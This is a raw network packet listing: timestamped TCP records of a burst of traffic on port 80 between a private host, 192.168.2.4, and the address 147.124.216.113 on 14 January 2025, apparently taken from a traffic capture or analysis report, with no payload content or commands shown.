Jan 14, 2025 08:08:12.346225023 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346240044 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346265078 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346280098 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346293926 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346314907 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346322060 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346328974 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346333981 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346338987 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346354008 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346353054 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.346354008 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.346354008 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.346354008 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.346369028 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346383095 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346399069 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346415043 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346430063 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346446991 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.346446991 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.346446991 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.346470118 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346477985 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.346518993 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346551895 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346575022 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.346606970 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346657991 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346661091 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.346688986 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346721888 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346740007 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.346752882 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346785069 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346810102 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.346833944 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346867085 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346895933 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.346898079 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346931934 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.346947908 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.346986055 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.347034931 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.347038031 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.347071886 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.347168922 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.347172976 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.347202063 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.347235918 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.347251892 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.347270012 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.347304106 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.347332954 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.347366095 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.347399950 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.347417116 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.347430944 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.347464085 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.347480059 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.347510099 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.347542048 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.347562075 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.347573996 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.347608089 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.347625017 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.347640991 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.347675085 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.347692966 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.347707033 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.347749949 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.347758055 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.383310080 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383347034 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383363962 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383378983 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383409023 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383431911 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383446932 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383469105 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383483887 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383498907 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383498907 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.383500099 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.383500099 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.383500099 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.383522987 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383538961 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383553028 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383569002 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383583069 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383590937 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.383590937 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.383590937 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.383599043 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383615017 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383619070 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.383632898 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383647919 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383661985 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383666039 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.383681059 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383691072 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.383697033 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383713007 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383727074 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383728981 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.383742094 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383752108 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.383764982 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383780003 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383781910 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.383795023 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383811951 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.383827925 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.383847952 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.384213924 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384296894 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384311914 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384334087 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384339094 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.384356022 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384371042 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384385109 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.384386063 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384404898 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384408951 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.384419918 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384434938 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384450912 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.384475946 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384479046 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.384491920 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384516001 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384530067 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384531975 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.384546995 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384562969 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384574890 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.384599924 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.384685993 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384701014 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384733915 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384747982 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384747982 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.384789944 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.384871960 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384896040 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384911060 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384926081 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384942055 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384942055 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.384958029 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384963036 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.384974957 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.384989977 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.385004997 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.385004997 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.385020018 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.385029078 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.385035038 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.385051012 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.385062933 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.385066986 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.385112047 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.385176897 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.385191917 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.385207891 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.385221004 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.385224104 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.385256052 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.385557890 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.436619043 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.436654091 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.436686993 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.436752081 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.436800957 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.436796904 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.436798096 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.436835051 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.436872005 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.436877012 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.436922073 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.436924934 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.436970949 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437004089 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437020063 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.437051058 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437083960 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437103987 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.437123060 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437134027 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437171936 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.437182903 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437231064 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437232018 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.437297106 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437346935 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437355995 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.437396049 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437444925 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.437446117 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437493086 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437544107 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.437544107 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437578917 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437612057 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437627077 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.437661886 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437695980 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437712908 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.437727928 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437774897 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.437782049 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437809944 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437841892 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437858105 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.437870026 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437901020 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437933922 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437942028 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.437964916 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.437980890 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.437998056 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.438029051 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.438041925 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.438061953 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.438092947 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.438112974 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.438128948 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.438159943 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.438174009 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.438191891 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.438222885 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.438236952 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.438256025 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.438287973 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.438302994 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.438321114 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.438353062 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.438374996 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.438374996 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.438385010 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.438416958 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.438431978 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.438462019 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.438493013 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.438507080 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.438527107 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.438559055 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.438575029 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.474000931 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474025011 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474040985 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474069118 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474071026 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.474085093 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474101067 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474101067 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.474117041 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474139929 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474155903 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474154949 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.474170923 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474186897 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474188089 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.474201918 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474210024 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.474225998 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474230051 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.474241018 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474256039 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474275112 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.474277973 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474293947 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474304914 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.474312067 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474328041 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474332094 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.474342108 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474365950 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474375963 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.474380016 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474391937 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474416971 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.474419117 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474431992 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474436998 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.474443913 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474456072 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474468946 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474492073 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.474492073 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.474503994 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474555016 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.474797964 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474860907 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474893093 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474910021 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.474942923 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474976063 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.474994898 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.475023985 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475058079 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475080013 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.475115061 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475127935 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475140095 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475152016 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475167036 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.475188971 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.475202084 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475234032 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475254059 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.475266933 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475301981 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475342989 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.475392103 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475445032 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475450993 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.475477934 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475508928 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475523949 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.475543022 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475579977 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475591898 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.475630045 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475677967 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.475678921 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475713968 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475744963 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475760937 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.475776911 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475809097 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475822926 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.475841999 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475872993 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475898981 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.475903988 CET	80	49737	147.124.216.113	192.168.2.4
